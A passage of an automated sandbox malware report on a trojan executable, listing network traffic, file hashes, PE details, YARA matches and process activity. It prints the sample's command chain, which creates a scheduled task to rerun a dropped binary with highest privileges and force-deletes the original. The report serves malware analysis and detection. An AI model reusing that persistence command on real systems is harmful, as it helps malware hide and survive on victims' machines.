                        unknown
                        https://www.imarket-eg.com/xmlrpc.php?rsdadvapi32.dll.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/htflexboxgrid.css?advapi32.dll.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.imarket-eg.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#eiadvapi32.dll.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/css/de-product-displayadvapi32.dll.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.imarket-eg.com/wp-content/plugins/chaty/js/cht-front-script.js?ver=1630326243advapi32.dll.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.imarket-eg.comadvapi32.dll.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.imarket-eg.com/wp-content/plugins/dethemekit-for-elementor/assets/js/de_loop/ecs_ajax_paadvapi32.dll.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        160.153.50.70
                        imarket-eg.comUnited States
                        26496AS-26496-GO-DADDY-COM-LLCUSfalse
                        IP
                        127.0.0.1
                        Joe Sandbox Version:36.0.0 Rainbow Opal
                        Analysis ID:749056
                        Start date and time:2022-11-18 07:51:36 +01:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 7m 41s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:QHSgso4hXH.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:24
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal88.troj.evad.winEXE@21/3@2/2
                        EGA Information:
                        • Successful, ratio: 66.7%
                        HDC Information:Failed
                        HCA Information:Failed
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
                        • Execution Graph export aborted for target ngentask.exe, PID 3128 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        TimeTypeDescription
                        07:52:54Task SchedulerRun new task: ngentask path: C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
                        No context
                        No context
                        No context
                        No context
                        No context
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):321
                        Entropy (8bit):5.355221377978991
                        Encrypted:false
                        SSDEEP:6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21v
                        MD5:03C5BA5FCE7124B503EA65EF522177C3
                        SHA1:F76B1F538D5EA66664355901E927B2F870ACCDD8
                        SHA-256:8128CE419BBE0419F1A0BDE97C3A14E3377C0184DC1D7AF61AA01AAB756B625B
                        SHA-512:151A974DDABA852144EC4BC18C548227A32E5261736F186A3920F2497434AEE9DBB0E0AB77E0E52A84A9FBC4529A158882B7549763400DDC2082D384B1135141
                        Malicious:false
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):85096
                        Entropy (8bit):6.068116381033184
                        Encrypted:false
                        SSDEEP:1536:vJ7xS0hlY2s+zFVNzXmGU8fnqGHcZEVjgGI:vfAR+z7Nmf8fqlZoK
                        MD5:ED7F195F7121781CC3D380942765B57D
                        SHA1:AEE93C4D84C2035C2FB20E4550672203FD209C60
                        SHA-256:CA003ECD9A6CAAE17824816D1D869173510B2EB3C13F62E1A5615F1DA64F9676
                        SHA-512:15CEC9427A9311539F352F3034293157FAA5EC6AD0C7B9777474359C6770C8DF1EEE689C3E1478698C90D58C296251759913DC255A2D7141B26A8B1BAFEFB4EA
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        • Antivirus: Metadefender, Detection: 0%, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....X.Z..............0.................. ... ....@.. .......................`......wm....`.....................................O.... ..@...............h>...@......X................................................ ............... ..H............text........ ...................... ..`.rsrc...@.... ......................@..@.reloc.......@......................@..B........................H........x..........9...........X........................................0...........s&...}.....('.....(.....{....-.*.,#.{....((........r...p......(>.....*..{....()...-......{....(*....+U...P...%....o+......i.3=..........(,...,,..()...,...(-.......(......3..{........o/....o0...%.-....,..o............rA..p......(>.....*....(....$..1........f.c.........H.........6.{.....o1...*...0..C........j..()...,..(-......(..........r}..p......%...(>......{......o/...*..................0..
                        Process:C:\Users\user\Desktop\QHSgso4hXH.exe
                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (7178), with CRLF, LF line terminators
                        Category:dropped
                        Size (bytes):92160
                        Entropy (8bit):5.333658046180996
                        Encrypted:false
                        SSDEEP:1536:zrDVpcYyhR/mNhRPufA7E+k6CBbEXKv/tji21YFuGBXkNsMrFuGBXkNsM2KxPhXh:zrROHmNbPv7Ebtu2GFpBkNPrFpBkNP2c
                        MD5:D458D9192514B396EB8ED0354EBD93D0
                        SHA1:BE508F92631C8532D7FEF5BA14B49C1AC22E72FB
                        SHA-256:9062710822767EA3799FDD96221969724D9A27F45800F1E8598D27761E8F9631
                        SHA-512:D76221B3885C18C7B7858AB16684B77E9E65FD47FCDC2441632544B6E90C6AB77C649795AD2FC147A9FDA8AF8B186927908E8F5DE1E416083D6F1150C618EBD0
                        Malicious:false
                        Preview:<!doctype html>.<html lang="en">.<head>..<meta charset="UTF-8">...<meta name="viewport" content="width=device-width, initial-scale=1">..<link rel="profile" href="https://gmpg.org/xfn/11">..<title>Page not found &#8211; iMarket EG</title>.<meta name='robots' content='max-image-preview:large' />.<link href='https://fonts.gstatic.com' crossorigin rel='preconnect' />.<link rel="alternate" type="application/rss+xml" title="iMarket EG &raquo; Feed" href="https://www.imarket-eg.com/feed/" />.<link rel="alternate" type="application/rss+xml" title="iMarket EG &raquo; Comments Feed" href="https://www.imarket-eg.com/comments/feed/" />.<style type="text/css">.img.wp-smiley,.img.emoji {..display: inline !important;..border: none !important;..box-shadow: none !important;..height: 1em !important;..width: 1em !important;..margin: 0 0.07em !important;..vertical-align: -0.1em !important;..background: none !important;..padding: 0 !important;.}.</style>..<link rel='stylesheet' id='chaty-front-css-css' hr
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.848246051600344
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:QHSgso4hXH.exe
                        File size:1138176
                        MD5:2f8df206ba700503dbebf59e937af0ec
                        SHA1:7c36d57af94f2dd16a62c09356b4ef2c63e456fd
                        SHA256:6bb1564eca89071edd9c42b84481aed5f3f5aaccedb8f61d6fb892b7f08bdca7
                        SHA512:6fbb58b3e3046498c64ad659db07ecd28357c54d65d2f1cf00220ce1bbd4fa4693dbe2c0df607a801f5cf6757bd5327735448c3babecb997ec85e88049275a59
                        SSDEEP:24576:+JqzI2HEUvWMJsbHsoO0YTyllU3OWuA5aRn:+JrbG70Y4WFZ8Rn
                        TLSH:B435F16AF7C2513BE845F2780A5381B5B6B7E8509E202F637522EA1F2D72087DC5707E
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........."...q...q...q..lq...q..Yq...q..mq...q..Tq...q...q...q..hq...q..]q...q..Pq...q..Zq...qRich...q........................PE..L..
                        Icon Hash:6e61c9d46464f2d5
                        Entrypoint:0x40607a
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                        Time Stamp:0x637709BB [Fri Nov 18 04:27:39 2022 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:15e5ac4e63af04f3034d99698484adf1
                        Instruction
                        call 00007FBDC0E6447Ah
                        jmp 00007FBDC0E60D1Eh
                        mov edi, edi
                        push ebp
                        mov ebp, esp
                        sub esp, 00000328h
                        mov dword ptr [004F3F00h], eax
                        mov dword ptr [004F3EFCh], ecx
                        mov dword ptr [004F3EF8h], edx
                        mov dword ptr [004F3EF4h], ebx
                        mov dword ptr [004F3EF0h], esi
                        mov dword ptr [004F3EECh], edi
                        mov word ptr [004F3F18h], ss
                        mov word ptr [004F3F0Ch], cs
                        mov word ptr [004F3EE8h], ds
                        mov word ptr [004F3EE4h], es
                        mov word ptr [004F3EE0h], fs
                        mov word ptr [004F3EDCh], gs
                        pushfd
                        pop dword ptr [004F3F10h]
                        mov eax, dword ptr [ebp+00h]
                        mov dword ptr [004F3F04h], eax
                        mov eax, dword ptr [ebp+04h]
                        mov dword ptr [004F3F08h], eax
                        lea eax, dword ptr [ebp+08h]
                        mov dword ptr [004F3F14h], eax
                        mov eax, dword ptr [ebp-00000320h]
                        mov dword ptr [004F3E50h], 00010001h
                        mov eax, dword ptr [004F3F08h]
                        mov dword ptr [004F3E04h], eax
                        mov dword ptr [004F3DF8h], C0000409h
                        mov dword ptr [004F3DFCh], 00000001h
                        mov eax, dword ptr [004F3284h]
                        mov dword ptr [ebp-00000328h], eax
                        mov eax, dword ptr [004F3288h]
                        mov dword ptr [ebp-00000324h], eax
                        call dword ptr [0000008Ch]
                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [IMP] VS2008 SP1 build 30729
                        • [RES] VS2010 build 30319
                        • [LNK] VS2010 build 30319
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0xf1dc40x50.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xf70000x23c70.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0xf00000x158.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000xee6b80xee800False0.8445238797169812data7.8950275690936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0xf00000x254a0x2600False0.3405633223684211data4.93477861528342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0xf30000x31a40xe00False0.19921875data2.249537468379531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0xf70000x23c700x23e00False0.8160864002613241data7.279101888009963IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        NameRVASizeTypeLanguageCountry
                        RT_ICON0xf74000x18084PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedPortugueseBrazil
                        RT_ICON0x10f4880x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384PortugueseBrazil
                        RT_ICON0x1136b00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216PortugueseBrazil
                        RT_ICON0x115c580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304PortugueseBrazil
                        RT_ICON0x116b000x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152PortugueseBrazil
                        RT_ICON0x1171680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096PortugueseBrazil
                        RT_ICON0x1182100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024PortugueseBrazil
                        RT_ICON0x118ab80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512PortugueseBrazil
                        RT_ICON0x118da00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304PortugueseBrazil
                        RT_ICON0x1197280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576PortugueseBrazil
                        RT_ICON0x119df00x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288PortugueseBrazil
                        RT_ICON0x119fd80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024PortugueseBrazil
                        RT_ICON0x11a4400x568Device independent bitmap graphic, 16 x 32 x 8, image size 256PortugueseBrazil
                        RT_ICON0x11a9a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128PortugueseBrazil
                        RT_MENU0x11aba00x48Matlab v4 mat-file (little endian) C, numeric, rows 5636240, columns 7077985, imaginaryPortugueseBrazil
                        RT_MENU0x11abe80x6cdataPortugueseBrazil
                        RT_ACCELERATOR0x11ac580x8dataPortugueseBrazil
                        RT_ACCELERATOR0x11ac600x10dataPortugueseBrazil
                        RT_GROUP_ICON0x11aad00xcaTarga image data - Map 32 x 32900 x 1 +1PortugueseBrazil
                        DLLImport
                        KERNEL32.dllCreateFileW, lstrcmpiW, HeapSize, WriteConsoleW, SetStdHandle, IsProcessorFeaturePresent, FlushFileBuffers, GetDiskFreeSpaceW, GetProcAddress, GetLastError, lstrcmpW, LoadLibraryW, CloseHandle, GlobalAlloc, MultiByteToWideChar, MoveFileA, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, DeleteFileA, HeapReAlloc, GetCommandLineW, HeapSetInformation, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, DecodePointer, TlsFree, GetModuleHandleW, SetLastError, GetCurrentThreadId, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, ExitProcess, WriteFile, GetModuleFileNameW, HeapCreate, Sleep, HeapFree, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, WideCharToMultiByte, LCMapStringW, GetStringTypeW, SetFilePointer, GetConsoleCP, GetConsoleMode, RtlUnwind
                        USER32.dllGetMessageW, LoadCursorW, GetDC, TranslateMessage, LoadIconW, ShowWindow, CreateWindowExW, RegisterClassW, DispatchMessageW
                        GDI32.dllCreateFontW, ChoosePixelFormat, SetPixelFormat, GetStockObject, CreateSolidBrush, DeleteObject
                        Language of compilation systemCountry where language is spokenMap
                        PortugueseBrazil
                        • Total Packets: 30
                        • 443 (HTTPS)
                        • 53 (DNS)
                        TimestampSource PortDest PortSource IPDest IP
                        Nov 18, 2022 07:52:44.552045107 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:44.552134037 CET44349702160.153.50.70192.168.2.6
                        Nov 18, 2022 07:52:44.552263975 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:44.607594967 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:44.607652903 CET44349702160.153.50.70192.168.2.6
                        Nov 18, 2022 07:52:45.107064962 CET44349702160.153.50.70192.168.2.6
                        Nov 18, 2022 07:52:45.107203960 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:45.531378984 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:45.531441927 CET44349702160.153.50.70192.168.2.6
                        Nov 18, 2022 07:52:45.532157898 CET44349702160.153.50.70192.168.2.6
                        Nov 18, 2022 07:52:45.532262087 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:45.536410093 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:45.536426067 CET44349702160.153.50.70192.168.2.6
                        Nov 18, 2022 07:52:47.669153929 CET44349702160.153.50.70192.168.2.6
                        Nov 18, 2022 07:52:47.669244051 CET44349702160.153.50.70192.168.2.6
                        Nov 18, 2022 07:52:47.669364929 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:47.669424057 CET44349702160.153.50.70192.168.2.6
                        Nov 18, 2022 07:52:47.669467926 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:47.669487953 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:47.831084013 CET44349702160.153.50.70192.168.2.6
                        Nov 18, 2022 07:52:47.831202984 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:47.831209898 CET44349702160.153.50.70192.168.2.6
                        Nov 18, 2022 07:52:47.831233978 CET44349702160.153.50.70192.168.2.6
                        Nov 18, 2022 07:52:47.831283092 CET44349702160.153.50.70192.168.2.6
                        Nov 18, 2022 07:52:47.831288099 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:47.831312895 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:47.831322908 CET44349702160.153.50.70192.168.2.6
                        Nov 18, 2022 07:52:47.831348896 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:47.831372976 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:47.831379890 CET44349702160.153.50.70192.168.2.6
                        Nov 18, 2022 07:52:47.831424952 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:47.993324995 CET44349702160.153.50.70192.168.2.6
                        Nov 18, 2022 07:52:47.993482113 CET44349702160.153.50.70192.168.2.6
                        Nov 18, 2022 07:52:47.993555069 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:47.993590117 CET44349702160.153.50.70192.168.2.6
                        Nov 18, 2022 07:52:47.993628025 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:47.993664026 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:47.993762970 CET44349702160.153.50.70192.168.2.6
                        Nov 18, 2022 07:52:47.993833065 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:47.993840933 CET44349702160.153.50.70192.168.2.6
                        Nov 18, 2022 07:52:47.993885040 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:47.994016886 CET44349702160.153.50.70192.168.2.6
                        Nov 18, 2022 07:52:47.994083881 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:47.994091988 CET44349702160.153.50.70192.168.2.6
                        Nov 18, 2022 07:52:47.994137049 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:47.994291067 CET44349702160.153.50.70192.168.2.6
                        Nov 18, 2022 07:52:47.994364977 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:47.994373083 CET44349702160.153.50.70192.168.2.6
                        Nov 18, 2022 07:52:47.994420052 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:48.156018972 CET44349702160.153.50.70192.168.2.6
                        Nov 18, 2022 07:52:48.156172991 CET44349702160.153.50.70192.168.2.6
                        Nov 18, 2022 07:52:48.156321049 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:48.156404972 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:48.173702002 CET49702443192.168.2.6160.153.50.70
                        Nov 18, 2022 07:52:48.173732042 CET44349702160.153.50.70192.168.2.6
                        TimestampSource PortDest PortSource IPDest IP
                        Nov 18, 2022 07:52:42.022449970 CET5310753192.168.2.68.8.8.8
                        Nov 18, 2022 07:52:42.040594101 CET53531078.8.8.8192.168.2.6
                        Nov 18, 2022 07:52:44.477853060 CET6460153192.168.2.68.8.8.8
                        Nov 18, 2022 07:52:44.497093916 CET53646018.8.8.8192.168.2.6
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Nov 18, 2022 07:52:42.022449970 CET192.168.2.68.8.8.80xd30bStandard query (0)vxsljuxgekdpuv.307xvytdn0A (IP address)IN (0x0001)false
                        Nov 18, 2022 07:52:44.477853060 CET192.168.2.68.8.8.80x1cd7Standard query (0)www.imarket-eg.comA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Nov 18, 2022 07:52:42.040594101 CET8.8.8.8192.168.2.60xd30bName error (3)vxsljuxgekdpuv.307xvytdn0nonenoneA (IP address)IN (0x0001)false
                        Nov 18, 2022 07:52:44.497093916 CET8.8.8.8192.168.2.60x1cd7No error (0)www.imarket-eg.comimarket-eg.comCNAME (Canonical name)IN (0x0001)false
                        Nov 18, 2022 07:52:44.497093916 CET8.8.8.8192.168.2.60x1cd7No error (0)imarket-eg.com160.153.50.70A (IP address)IN (0x0001)false
                        • www.imarket-eg.com
                        Target ID:0
                        Start time:07:52:34
                        Start date:18/11/2022
                        Path:C:\Users\user\Desktop\QHSgso4hXH.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\Desktop\QHSgso4hXH.exe
                        Imagebase:0x400000
                        File size:1138176 bytes
                        MD5 hash:2F8DF206BA700503DBEBF59E937AF0EC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., Source: 00000000.00000003.260166226.0000000002256000.00000040.00000800.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000000.00000003.260166226.0000000002256000.00000040.00000800.00020000.00000000.sdmp, Author: Florian Roth
                        Reputation:low

                        Target ID:1
                        Start time:07:52:43
                        Start date:18/11/2022
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
                        Imagebase:0xae0000
                        File size:85096 bytes
                        MD5 hash:ED7F195F7121781CC3D380942765B57D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Reputation:moderate

                        Target ID:2
                        Start time:07:52:45
                        Start date:18/11/2022
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe" &&START "" "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
                        Imagebase:0x1b0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                        Target ID:3
                        Start time:07:52:45
                        Start date:18/11/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6da640000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:4
                        Start time:07:52:45
                        Start date:18/11/2022
                        Path:C:\Windows\SysWOW64\chcp.com
                        Wow64 process (32bit):true
                        Commandline:chcp 65001
                        Imagebase:0x1b0000
                        File size:12800 bytes
                        MD5 hash:561054CF9C4B2897E80D7E7D9027FED9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                        Target ID:5
                        Start time:07:52:45
                        Start date:18/11/2022
                        Path:C:\Windows\SysWOW64\PING.EXE
                        Wow64 process (32bit):true
                        Commandline:ping 127.0.0.1
                        Imagebase:0x13e0000
                        File size:18944 bytes
                        MD5 hash:70C24A306F768936563ABDADB9CA9108
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                        Target ID:7
                        Start time:07:52:52
                        Start date:18/11/2022
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:schtasks /create /tn "ngentask" /sc MINUTE /tr "C:\Users\user\AppData\Local\ServiceHub\ngentask.exe" /rl HIGHEST /f
                        Imagebase:0x950000
                        File size:185856 bytes
                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                        Target ID:8
                        Start time:07:52:53
                        Start date:18/11/2022
                        Path:C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\ServiceHub\ngentask.exe"
                        Imagebase:0x6d0000
                        File size:85096 bytes
                        MD5 hash:ED7F195F7121781CC3D380942765B57D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Antivirus matches:
                        • Detection: 0%, ReversingLabs
                        • Detection: 0%, Metadefender, Browse
                        Reputation:moderate

                        Target ID:9
                        Start time:07:52:53
                        Start date:18/11/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6da640000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Target ID:11
                        Start time:07:52:55
                        Start date:18/11/2022
                        Path:C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
                        Imagebase:0x6d0000
                        File size:85096 bytes
                        MD5 hash:ED7F195F7121781CC3D380942765B57D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        Target ID:13
                        Start time:07:52:55
                        Start date:18/11/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6da640000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Target ID:18
                        Start time:07:53:01
                        Start date:18/11/2022
                        Path:C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\ServiceHub\ngentask.exe
                        Imagebase:0x580000
                        File size:85096 bytes
                        MD5 hash:ED7F195F7121781CC3D380942765B57D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        Target ID:19
                        Start time:07:53:02
                        Start date:18/11/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
